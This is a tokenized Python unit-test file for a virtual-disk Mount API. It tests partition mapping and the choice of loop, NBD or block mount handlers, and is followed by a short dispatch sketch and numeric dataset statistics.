name|'partition'
op|','
name|'trycmd'
op|')'
op|':'
newline|'\n'
indent|' '
name|'trycmd'
op|'.'
name|'return_value'
op|'='
op|'['
name|'None'
op|','
name|'None'
op|']'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev'
op|'('
name|'partition'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'trycmd'
op|'.'
name|'call_count'
op|')'
comment|"# don't care about args"
newline|'\n'
name|'return'
name|'mount'
newline|'\n'
nl|'\n'
DECL|member|_exists_effect
dedent|''
name|'def'
name|'_exists_effect'
op|'('
name|'self'
op|','
name|'data'
op|')'
op|':'
newline|'\n'
DECL|function|exists_effect
indent|' '
name|'def'
name|'exists_effect'
op|'('
name|'filename'
op|')'
op|':'
newline|'\n'
indent|' '
name|'try'
op|':'
newline|'\n'
indent|' '
name|'v'
op|'='
name|'data'
op|'['
name|'filename'
op|']'
newline|'\n'
name|'if'
name|'isinstance'
op|'('
name|'v'
op|','
name|'list'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'len'
op|'('
name|'v'
op|')'
op|'>'
number|'0'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'v'
op|'.'
name|'pop'
op|'('
number|'0'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
string|'"Out of items for: %s"'
op|'%'
name|'filename'
op|')'
newline|'\n'
dedent|''
name|'return'
name|'v'
newline|'\n'
dedent|''
name|'except'
name|'KeyError'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fail'
op|'('
string|'"Unexpected call with: %s"'
op|'%'
name|'filename'
op|')'
newline|'\n'
dedent|''
dedent|''
name|'return'
name|'exists_effect'
newline|'\n'
nl|'\n'
DECL|member|_check_calls
dedent|''
name|'def'
name|'_check_calls'
op|'('
name|'self'
op|','
name|'exists'
op|','
name|'filenames'
op|','
name|'trailing'
op|'='
number|'0'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'x'
op|')'
name|'for'
name|'x'
name|'in'
name|'filenames'
op|']'
op|','
nl|'\n'
name|'exists'
op|'.'
name|'call_args_list'
op|'['
op|':'
name|'len'
op|'('
name|'filenames'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
name|'mock'
op|'.'
name|'call'
op|'('
name|'MAP_PARTITION'
op|')'
op|']'
op|'*'
name|'trailing'
op|','
nl|'\n'
name|'exists'
op|'.'
name|'call_args_list'
op|'['
name|'len'
op|'('
name|'filenames'
op|')'
op|':'
op|']'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_partition_search
name|'def'
name|'test_map_dev_partition_search'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev'
op|'('
op|'-'
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotEqual'
op|'('
string|'""'
op|','
name|'mount'
op|'.'
name|'error'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_good
name|'def'
name|'test_map_dev_good'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'False'
op|','
nl|'\n'
name|'MAP_PARTITION'
op|':'
op|'['
name|'False'
op|','
name|'True'
op|']'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev_with_trycmd'
op|'('
name|'PARTITION'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|','
name|'AUTOMAP_PARTITION'
op|']'
op|','
number|'2'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'""'
op|','
name|'mount'
op|'.'
name|'error'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_error
name|'def'
name|'test_map_dev_error'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'False'
op|','
nl|'\n'
name|'MAP_PARTITION'
op|':'
name|'False'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev_with_trycmd'
op|'('
name|'PARTITION'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|','
name|'AUTOMAP_PARTITION'
op|']'
op|','
nl|'\n'
name|'api'
op|'.'
name|'MAX_FILE_CHECKS'
op|'+'
number|'1'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotEqual'
op|'('
string|'""'
op|','
name|'mount'
op|'.'
name|'error'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_error_then_pass
name|'def'
name|'test_map_dev_error_then_pass'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'False'
op|','
nl|'\n'
name|'MAP_PARTITION'
op|':'
op|'['
name|'False'
op|','
name|'False'
op|','
name|'True'
op|']'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev_with_trycmd'
op|'('
name|'PARTITION'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|','
name|'AUTOMAP_PARTITION'
op|']'
op|','
number|'3'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'""'
op|','
name|'mount'
op|'.'
name|'error'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_automap
name|'def'
name|'test_map_dev_automap'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'True'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev'
op|'('
name|'PARTITION'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
nl|'\n'
op|'['
name|'ORIG_DEVICE'
op|','
name|'AUTOMAP_PARTITION'
op|','
name|'AUTOMAP_PARTITION'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'AUTOMAP_PARTITION'
op|','
name|'mount'
op|'.'
name|'mapped_device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'automapped'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'os.path.exists'"
op|')'
newline|'\n'
DECL|member|test_map_dev_else
name|'def'
name|'test_map_dev_else'
op|'('
name|'self'
op|','
name|'exists'
op|')'
op|':'
newline|'\n'
indent|' '
name|'exists'
op|'.'
name|'side_effect'
op|'='
name|'self'
op|'.'
name|'_exists_effect'
op|'('
op|'{'
nl|'\n'
name|'ORIG_DEVICE'
op|':'
name|'True'
op|','
nl|'\n'
name|'AUTOMAP_PARTITION'
op|':'
name|'True'
op|'}'
op|')'
newline|'\n'
name|'mount'
op|'='
name|'self'
op|'.'
name|'_test_map_dev'
op|'('
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_check_calls'
op|'('
name|'exists'
op|','
op|'['
name|'ORIG_DEVICE'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'ORIG_DEVICE'
op|','
name|'mount'
op|'.'
name|'mapped_device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'mount'
op|'.'
name|'automapped'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'mount'
op|'.'
name|'mapped'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_format_raw
dedent|''
name|'def'
name|'test_instance_for_format_raw'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'imgmodel'
op|'.'
name|'LocalFileImage'
op|'('
string|'"/some/file.raw"'
op|','
nl|'\n'
name|'imgmodel'
op|'.'
name|'FORMAT_RAW'
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_format'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'loop'
op|'.'
name|'LoopMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_format_qcow2
dedent|''
name|'def'
name|'test_instance_for_format_qcow2'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'imgmodel'
op|'.'
name|'LocalFileImage'
op|'('
string|'"/some/file.qcows"'
op|','
nl|'\n'
name|'imgmodel'
op|'.'
name|'FORMAT_QCOW2'
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_format'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'nbd'
op|'.'
name|'NbdMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_format_block
dedent|''
name|'def'
name|'test_instance_for_format_block'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'imgmodel'
op|'.'
name|'LocalBlockImage'
op|'('
nl|'\n'
string|'"/dev/mapper/instances--instance-0000001_disk"'
op|','
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_format'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'block'
op|'.'
name|'BlockMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_loop
dedent|''
name|'def'
name|'test_instance_for_device_loop'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/loop0'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'loop'
op|'.'
name|'LoopMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_loop_partition
dedent|''
name|'def'
name|'test_instance_for_device_loop_partition'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/mapper/loop0p1'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'loop'
op|'.'
name|'LoopMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_nbd
dedent|''
name|'def'
name|'test_instance_for_device_nbd'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/nbd0'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'nbd'
op|'.'
name|'NbdMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_nbd_partition
dedent|''
name|'def'
name|'test_instance_for_device_nbd_partition'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/mapper/nbd0p1'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'nbd'
op|'.'
name|'NbdMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_block
dedent|''
name|'def'
name|'test_instance_for_device_block'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
op|'-'
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/mapper/instances--instance-0000001_disk'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'block'
op|'.'
name|'BlockMount'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_instance_for_device_block_partition
dedent|''
name|'def'
name|'test_instance_for_device_block_partition'
op|'('
name|'self'
op|','
op|')'
op|':'
newline|'\n'
indent|' '
name|'image'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'mount_dir'
op|'='
string|"'/mount/dir'"
newline|'\n'
name|'partition'
op|'='
number|'1'
newline|'\n'
name|'device'
op|'='
string|"'/dev/mapper/instances--instance-0000001_diskp1'"
newline|'\n'
name|'inst'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'.'
name|'instance_for_device'
op|'('
name|'image'
op|','
name|'mount_dir'
op|','
name|'partition'
op|','
nl|'\n'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsInstance'
op|'('
name|'inst'
op|','
name|'block'
op|'.'
name|'BlockMount'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
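The token stream above encodes unit tests for a Mount factory: instance_for_format picks an implementation from the image type (raw file -> LoopMount, qcow2 file -> NbdMount, block device -> BlockMount), and instance_for_device re-derives it from an already mapped device path. As a hedged illustration only, a minimal dispatcher with the same shape might look like this; the names FORMAT_RAW, FORMAT_QCOW2, LoopMount, NbdMount and BlockMount come from the test tokens, everything else is assumed and is not the underlying project's real implementation.

# Minimal sketch of the dispatch behaviour the tokenized tests above exercise.
# Only the class and constant names are taken from the test tokens; the rest
# is illustrative.
FORMAT_RAW = 'raw'
FORMAT_QCOW2 = 'qcow2'

class Mount(object):
    def __init__(self, image, mount_dir, partition, device=None):
        self.image = image
        self.mount_dir = mount_dir
        self.partition = partition
        self.device = device

    @classmethod
    def instance_for_format(cls, image, mount_dir, partition):
        # Block devices mount directly; file images dispatch on their format.
        if getattr(image, 'is_block_dev', False):
            return BlockMount(image, mount_dir, partition)
        if image.format == FORMAT_RAW:
            return LoopMount(image, mount_dir, partition)
        return NbdMount(image, mount_dir, partition)

    @classmethod
    def instance_for_device(cls, image, mount_dir, partition, device):
        # Re-attach to an already mapped device by inspecting its path.
        if 'loop' in device:
            return LoopMount(image, mount_dir, partition, device)
        if 'nbd' in device:
            return NbdMount(image, mount_dir, partition, device)
        return BlockMount(image, mount_dir, partition, device)

class LoopMount(Mount):
    pass

class NbdMount(Mount):
    pass

class BlockMount(Mount):
    pass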
| 12.459424
| 88
| 0.6081
| 2,821
| 19,038
| 3.999646
| 0.069833
| 0.183462
| 0.091288
| 0.070726
| 0.851458
| 0.826642
| 0.782771
| 0.752016
| 0.711956
| 0.67615
| 0
| 0.003619
| 0.100116
| 19,038
| 1,527
| 89
| 12.467584
| 0.654973
| 0
| 0
| 0.937132
| 0
| 0
| 0.355605
| 0.033092
| 0
| 0
| 0
| 0
| 0.017027
| 0
| null | null | 0.00131
| 0.004584
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f3a58ab1e1c766015be409c5fa0e14d65d1b6b40
| 155
|
py
|
Python
|
mrcp/turnouts/__init__.py
|
danielvilas/mrcp
|
8b79c2487ec8acf6678113772e70a32e2ab24d72
|
[
"MIT"
] | null | null | null |
mrcp/turnouts/__init__.py
|
danielvilas/mrcp
|
8b79c2487ec8acf6678113772e70a32e2ab24d72
|
[
"MIT"
] | null | null | null |
mrcp/turnouts/__init__.py
|
danielvilas/mrcp
|
8b79c2487ec8acf6678113772e70a32e2ab24d72
|
[
"MIT"
] | null | null | null |
from mrcp.turnouts.halfturnout import *
from mrcp.turnouts.ladderstep import *
from mrcp.turnouts.turnout import *
from mrcp.turnouts.curveturnout import *
| 38.75
| 40
| 0.825806
| 20
| 155
| 6.4
| 0.4
| 0.25
| 0.5
| 0.515625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 155
| 4
| 40
| 38.75
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
34051130b8046d64465b728ddb382eaaa1f7bc7d
| 47
|
py
|
Python
|
metrics/__init__.py
|
zhongerqiandan/OpenDialog
|
f478b2a912c8c742da5ced510ac40da59217ddb3
|
[
"MIT"
] | 98
|
2020-07-16T06:27:29.000Z
|
2022-03-12T15:21:51.000Z
|
metrics/__init__.py
|
zhongerqiandan/OpenDialog
|
f478b2a912c8c742da5ced510ac40da59217ddb3
|
[
"MIT"
] | 2
|
2020-07-22T12:00:17.000Z
|
2021-02-24T01:19:14.000Z
|
metrics/__init__.py
|
gmftbyGMFTBY/OpenDialog
|
8eb56b7a21cea1172131db7a56d2656364144771
|
[
"MIT"
] | 19
|
2020-07-16T08:36:09.000Z
|
2021-09-14T05:36:54.000Z
|
from .metric import *
from .ir_metric import *
| 15.666667
| 24
| 0.744681
| 7
| 47
| 4.857143
| 0.571429
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 47
| 2
| 25
| 23.5
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
347060ba1e8ef3b500c329d2c68922d1d57c96c0
| 4,785
|
py
|
Python
|
api/views.py
|
rauanisanfelice/django-api-ecommerce
|
3b8c0db70841eb9bd0fb5e115b266e4c9d80751a
|
[
"MIT"
] | null | null | null |
api/views.py
|
rauanisanfelice/django-api-ecommerce
|
3b8c0db70841eb9bd0fb5e115b266e4c9d80751a
|
[
"MIT"
] | null | null | null |
api/views.py
|
rauanisanfelice/django-api-ecommerce
|
3b8c0db70841eb9bd0fb5e115b266e4c9d80751a
|
[
"MIT"
] | null | null | null |
import logging
from django.contrib.auth.models import User
from rest_framework import mixins, generics, permissions, viewsets
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.schemas.openapi import AutoSchema
from .models import Produto, Categoria
from .serializers import ProdutoSerializer, CategoriaSerializer, UserSerializer
logger = logging.getLogger(__name__)
class UserList(generics.ListAPIView):
"""Lista todos usuários."""
schema = AutoSchema(tags=["Usuários"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = User.objects.all()
serializer_class = UserSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"UserList {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
class UserDetail(generics.RetrieveAPIView):
"""Detalhes do usuário."""
schema = AutoSchema(tags=["Usuários"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = User.objects.all()
serializer_class = UserSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"UserDetail {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
class ProdutoList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):
"""Lista todos produtos, ou cria um novo produto."""
schema = AutoSchema(tags=["Produtos"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = Produto.objects.all()
serializer_class = ProdutoSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"ProdutoList {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class ProdutoDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):
schema = AutoSchema(tags=["Produtos"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = Produto.objects.all()
serializer_class = ProdutoSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"ProdutoDetail {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
class CategoriaList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):
"""Lista todas categorias, ou cria uma nova categoria."""
schema = AutoSchema(tags=["Categorias"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = Categoria.objects.all()
serializer_class = CategoriaSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"CategoriaList {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class CategoriaDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView):
schema = AutoSchema(tags=["Categorias"])
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
queryset = Categoria.objects.all()
serializer_class = CategoriaSerializer
def dispatch(self, request, *args, **kwargs):
logger.info(f"CategoriaDetail {request.method} ({request.user.username})")
return super().dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
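These generic views only become reachable once they are routed. As a hedged illustration, a hypothetical urls.py wiring them up could look like the following; the URL paths and route names are assumptions, not taken from the repository.

# Hypothetical urls.py for the views above; paths and route names are
# illustrative assumptions, not taken from the repository.
from django.urls import path

from api import views

urlpatterns = [
    path('users/', views.UserList.as_view(), name='user-list'),
    path('users/<int:pk>/', views.UserDetail.as_view(), name='user-detail'),
    path('produtos/', views.ProdutoList.as_view(), name='produto-list'),
    path('produtos/<int:pk>/', views.ProdutoDetail.as_view(), name='produto-detail'),
    path('categorias/', views.CategoriaList.as_view(), name='categoria-list'),
    path('categorias/<int:pk>/', views.CategoriaDetail.as_view(), name='categoria-detail'),
]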
| 34.927007
| 125
| 0.71348
| 472
| 4,785
| 7.177966
| 0.188559
| 0.103896
| 0.160567
| 0.099174
| 0.792208
| 0.792208
| 0.792208
| 0.751476
| 0.751476
| 0.751476
| 0
| 0
| 0.163636
| 4,785
| 137
| 126
| 34.927007
| 0.846577
| 0.029467
| 0
| 0.746988
| 0
| 0
| 0.08218
| 0.032439
| 0
| 0
| 0
| 0.007299
| 0
| 1
| 0.192771
| false
| 0
| 0.096386
| 0.120482
| 0.915663
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
348289331a6d2754e19c39e370ac6704cc3f22da
| 1,532
|
py
|
Python
|
boto3_type_annotations/boto3_type_annotations/dms/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
